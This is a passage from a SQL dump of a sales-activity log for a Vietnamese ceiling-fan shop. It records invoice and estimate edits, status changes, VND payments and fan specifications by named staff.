(1490, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-02 18:53:38'),
(1491, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:40:\"Quạt trần KATRINA 52 Gray Maple Wood\";}', '1', 'Ho Gia Phat', '2022-12-02 18:53:38'),
(1492, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";}', '1', 'Ho Gia Phat', '2022-12-02 18:53:38'),
(1493, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-02 18:53:38'),
(1494, 'invoice', 236, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-02 18:54:05'),
(1495, 'invoice', 236, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2022-12-02 18:54:05'),
(1496, 'invoice', 236, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:551:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China    <br />\r\n\";i:1;s:497:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '1', 'Ho Gia Phat', '2022-12-02 18:54:39'),
(1497, 'invoice', 236, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '1', 'Ho Gia Phat', '2022-12-02 18:54:39'),
(1498, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";}', '16', 'Tuyền Ngọc', '2022-12-03 08:23:22'),
(1499, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Tuyền Ngọc', '2022-12-03 08:23:22'),
(1500, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:37:\"Quạt trần KATRINA Dark Wanut Gray\";}', '16', 'Tuyền Ngọc', '2022-12-03 08:23:22'),
(1501, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Tuyền Ngọc', '2022-12-03 08:23:22'),
(1502, 'invoice', 236, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-03 11:34:36'),
(1503, 'invoice', 236, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"22.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/241\" target=\"_blank\">#241</a>\";}', '1', 'Ho Gia Phat', '2022-12-03 11:34:36'),
(1504, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Tuyền Ngọc', '2022-12-03 11:37:15'),
(1505, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '16', 'Tuyền Ngọc', '2022-12-03 11:37:15'),
(1506, 'invoice', 236, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '16', 'Tuyền Ngọc', '2022-12-03 11:37:15'),
(1507, 'invoice', 234, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-03 13:27:35'),
(1508, 'invoice', 234, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/242\" target=\"_blank\">#242</a>\";}', '1', 'Ho Gia Phat', '2022-12-03 13:27:35'),
(1509, 'invoice', 233, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-03 13:28:45'),
(1510, 'invoice', 233, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.230.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/243\" target=\"_blank\">#243</a>\";}', '1', 'Ho Gia Phat', '2022-12-03 13:28:45'),
(1511, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '16', 'Tuyền Ngọc', '2022-12-03 13:41:08'),
(1512, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Tuyền Ngọc', '2022-12-03 13:41:08'),
(1513, 'invoice', 236, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '16', 'Tuyền Ngọc', '2022-12-03 13:41:08'),
(1514, 'invoice', 236, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '16', 'Tuyền Ngọc', '2022-12-03 13:45:59'),
(1515, 'invoice', 236, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/244\" target=\"_blank\">#244</a>\";}', '16', 'Tuyền Ngọc', '2022-12-03 13:45:59'),
(1516, 'estimate', 141, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-12-04 13:55:10'),
(1517, 'estimate', 141, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-04 13:56:22'),
(1518, 'estimate', 141, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '1', 'Ho Gia Phat', '2022-12-04 13:56:32'),
(1522, 'estimate', 143, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-12-05 10:44:58'),
(1524, 'estimate', 143, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/237\">INV-229-22</a>\";}', '1', 'Ho Gia Phat', '2022-12-05 10:46:16'),
(1525, 'estimate', 143, 'not_estimate_invoice_deleted', '', '1', 'Ho Gia Phat', '2022-12-05 10:50:16'),
(1526, 'estimate', 143, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-05 10:55:05'),
(1527, 'estimate', 143, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-05 10:56:29'),
(1528, 'estimate', 143, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:25:\"Phí quản lý thi công\";}', '1', 'Ho Gia Phat', '2022-12-05 10:57:10'),
(1529, 'estimate', 143, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:32:\"Gia cố móc treo quạt trần\";i:1;s:98:\"Gia cố móc treo quạt trần\r\n(chưa bao gồm dây điện, cấp nguồn điện cho quạt)\";}', '1', 'Ho Gia Phat', '2022-12-05 10:58:17'),
(1530, 'estimate', 143, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5000000.00\";i:1;s:10:\"6000000.00\";}', '1', 'Ho Gia Phat', '2022-12-05 10:58:17'),
(1531, 'estimate', 143, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-05 13:51:06'),
(1532, 'estimate', 143, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:56:\"Quạt trần Hamachi 5 cánh nhựa màu Vân Gỗ KOA.\";}', '1', 'Ho Gia Phat', '2022-12-05 13:51:06'),
(1533, 'estimate', 143, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:32:\"Quạt trần HAMACHI 52 LED KOA\";}', '1', 'Ho Gia Phat', '2022-12-05 13:51:06'),
(1534, 'estimate', 143, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-05 13:51:06'),
(1535, 'estimate', 143, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '1', 'Ho Gia Phat', '2022-12-05 13:51:12'),
(1536, 'estimate', 144, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-12-05 17:35:01'),
(1537, 'estimate', 144, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:341:\"Sải cánh 173cm (~ 66inch)<br />\r\nMàu cánh: Sliver, chất liệu cánh nhựa ABS<br />\r\nMàu thân quạt: Brush Nickel, màu inox sáng<br />\r\nĐộng cơ DC, công suất 46W<br />\r\nĐiều khiển 6 cấp độ đi kèm<br />\r\nThương hiệu: Mountain Air/China<br />\r\nBảo hành 3 năm động cơ, 1 năm phụ kiện đi kèm  \";i:1;s:304:\"Sải cánh 173cm (~ 66inch)\r\nMàu cánh: Sliver, chất liệu cánh nhựa ABS\r\nMàu thân quạt: Brush Nickel, màu inox sáng\r\nĐộng cơ DC, công suất 46W\r\nĐiều khiển 6 cấp độ đi kèm\r\nThương hiệu: Mountain Air/China\r\nBảo hành 05 năm động cơ, 1 năm phụ kiện đi kèm\";}', '1', 'Ho Gia Phat', '2022-12-05 17:35:23'),
(1538, 'estimate', 144, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '1', 'Ho Gia Phat', '2022-12-05 17:35:30'),
(1539, 'invoice', 238, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-05 17:35:46'),
(1540, 'estimate', 144, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/238\">INV-229-22</a>\";}', '1', 'Ho Gia Phat', '2022-12-05 17:35:46'),
(1541, 'invoice', 238, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"45\";}', '1', 'Ho Gia Phat', '2022-12-05 17:36:50'),
(1542, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-12-06 08:52:46'),
(1543, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-12-06 08:52:50'),
(1544, 'invoice', 238, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 08:55:12'),
(1545, 'invoice', 238, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.950.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/245\" target=\"_blank\">#245</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 08:55:12'),
(1546, 'estimate', 145, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-12-06 08:57:50'),
(1547, 'estimate', 145, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '1', 'Ho Gia Phat', '2022-12-06 09:01:13'),
(1548, 'estimate', 145, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '1', 'Ho Gia Phat', '2022-12-06 09:01:19'),
(1549, 'estimate', 145, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '1', 'Ho Gia Phat', '2022-12-06 09:01:38'),
(1550, 'estimate', 145, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '1', 'Ho Gia Phat', '2022-12-06 09:01:45'),
(1551, 'invoice', 239, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-06 09:01:49'),
(1552, 'estimate', 145, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/239\">INV-230-22</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 09:01:50');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(1553, 'invoice', 239, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"28\";}', '1', 'Ho Gia Phat', '2022-12-06 09:02:09'),
(1554, 'invoice', 117, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:28:39'),
(1555, 'invoice', 188, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:28:52'),
(1556, 'invoice', 210, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:28:57'),
(1557, 'invoice', 210, 'invoice_activity_unmarked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:29:05'),
(1558, 'invoice', 198, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:29:11'),
(1559, 'invoice', 210, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:29:20'),
(1560, 'invoice', 210, 'invoice_activity_unmarked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:29:30'),
(1561, 'invoice', 210, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-12-06 11:29:40'),
(1562, 'invoice', 239, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:30:14'),
(1563, 'invoice', 239, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.376.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/246\" target=\"_blank\">#246</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:30:14'),
(1564, 'invoice', 235, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:30:51'),
(1565, 'invoice', 235, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/247\" target=\"_blank\">#247</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:30:51'),
(1566, 'invoice', 135, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:32:18'),
(1567, 'invoice', 135, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/248\" target=\"_blank\">#248</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:32:18'),
(1568, 'invoice', 135, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:18:\"omanizen@gmail.com\";}', '1', 'Ho Gia Phat', '2022-12-06 11:32:22'),
(1569, 'invoice', 131, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:32:44'),
(1570, 'invoice', 131, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.857.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/249\" target=\"_blank\">#249</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:32:44'),
(1571, 'invoice', 169, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:36:12'),
(1572, 'invoice', 169, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"93.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/250\" target=\"_blank\">#250</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:36:12'),
(1573, 'invoice', 186, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:37:12'),
(1574, 'invoice', 186, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/251\" target=\"_blank\">#251</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:37:12'),
(1575, 'invoice', 92, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:38:36'),
(1576, 'invoice', 92, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"166.870.945 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/252\" target=\"_blank\">#252</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:38:36'),
(1577, 'invoice', 124, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:38:56'),
(1578, 'invoice', 124, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"52.313.100 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/253\" target=\"_blank\">#253</a>\";}', '1', 'Ho Gia Phat', '2022-12-06 11:38:56'),
(1582, 'invoice', 240, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-06 15:40:45'),
(1583, 'estimate', 147, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2022-12-10 17:48:37'),
(1584, 'estimate', 148, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2022-12-10 17:52:44'),
(1585, 'estimate', 149, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-12-12 09:34:53'),
(1586, 'invoice', 241, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-12 09:35:01'),
(1587, 'estimate', 149, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/241\">INV-236-22</a>\";}', '1', 'Ho Gia Phat', '2022-12-12 09:35:01'),
(1588, 'invoice', 241, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:317:\"2 động cơ AC, công suất 75W x2  <br />\r\nSố cánh quạt: 8 cánh, chất liệu cánh bằng gỗ tự nhiên solid wood <br />\r\nMàu thân quạt: Đen <br />\r\nMàu cánh quạt: Dark Walnut <br />\r\nModel: 52YFT-7010 <br />\r\nThương hiệu: Mountain Air/China <br />\r\nĐiều khiển 3 tốc độ đi kèm\";i:1;s:302:\"2 động cơ AC, công suất 75W x2  \r\nSố cánh quạt: 8 cánh, chất liệu cánh bằng gỗ tự nhiên solid wood \r\nMàu thân quạt: Đen \r\nMàu cánh quạt: Dark Walnut \r\nModel: 52YFT-7010 \r\nThương hiệu: Mountain Air/China \r\nĐiều khiển 3 tốc độ đi kèm\r\nBảo hành: 1 năm\";}', '1', 'Ho Gia Phat', '2022-12-12 09:38:11'),
(1589, 'estimate', 150, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-12-12 09:45:56'),
(1590, 'invoice', 242, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-12 09:46:25'),
(1591, 'estimate', 150, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/242\">INV-237-22</a>\";}', '1', 'Ho Gia Phat', '2022-12-12 09:46:25'),
(1592, 'estimate', 147, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:439:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n\";i:1;s:375:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Trắng/Đen   \r\nMàu cánh: Maple Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '18', 'Phương Mỹ', '2022-12-13 14:46:58'),
(1593, 'estimate', 151, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-12-14 09:19:15'),
(1594, 'estimate', 151, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5800000.00\";i:1;s:10:\"5600000.00\";}', '17', 'Loan Nguyễn', '2022-12-14 09:20:49'),
(1595, 'invoice', 243, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-12-14 09:21:16'),
(1596, 'estimate', 151, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/243\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2022-12-14 09:21:16'),
(1597, 'invoice', 243, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2022-12-14 09:22:12'),
(1598, 'invoice', 243, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-12-14 09:26:16'),
(1599, 'invoice', 243, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:507:\"Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)\";i:1;s:425:\"Sải cánh 132cm \r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) \r\nMàu thân Quạt: trắng  \r\nSải Cánh Quạt: 1m32 ~ 52 inchs \r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm \r\nAirflow (M3/Min): 6823 CFM \r\nTốc Độ Quay: 5-6 cấp độ gió \r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China \r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)\";}', '17', 'Loan Nguyễn', '2022-12-14 09:28:44'),
(1600, 'invoice', 243, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:473:\"Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: trắng  <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)\";i:1;s:425:\"Sải cánh 132cm \r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) \r\nMàu thân Quạt: Trắng  \r\nSải Cánh Quạt: 1m32 ~ 52 inchs \r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm \r\nAirflow (M3/Min): 6823 CFM \r\nTốc Độ Quay: 5-6 cấp độ gió \r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China \r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)\";}', '17', 'Loan Nguyễn', '2022-12-14 09:29:08'),
(1601, 'invoice', 243, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:24:\"Thay PIN điều khiển\";}', '17', 'Loan Nguyễn', '2022-12-14 17:15:03'),
(1602, 'invoice', 243, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-14 17:23:25'),
(1603, 'invoice', 243, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2022-12-14 17:23:25'),
(1604, 'invoice', 243, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-14 17:29:30'),
(1605, 'invoice', 243, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.550.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/254\" target=\"_blank\">#254</a>\";}', '17', 'Loan Nguyễn', '2022-12-14 17:29:30'),
(1606, 'invoice', 242, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:28:\"Bộ đèn LED quạt trần\";}', '17', 'Loan Nguyễn', '2022-12-16 11:49:26'),
(1607, 'invoice', 242, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-16 11:49:42'),
(1608, 'invoice', 242, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/255\" target=\"_blank\">#255</a>\";}', '17', 'Loan Nguyễn', '2022-12-16 11:49:42'),
(1609, 'invoice', 241, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-16 11:51:21'),
(1610, 'invoice', 241, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/256\" target=\"_blank\">#256</a>\";}', '17', 'Loan Nguyễn', '2022-12-16 11:51:21'),
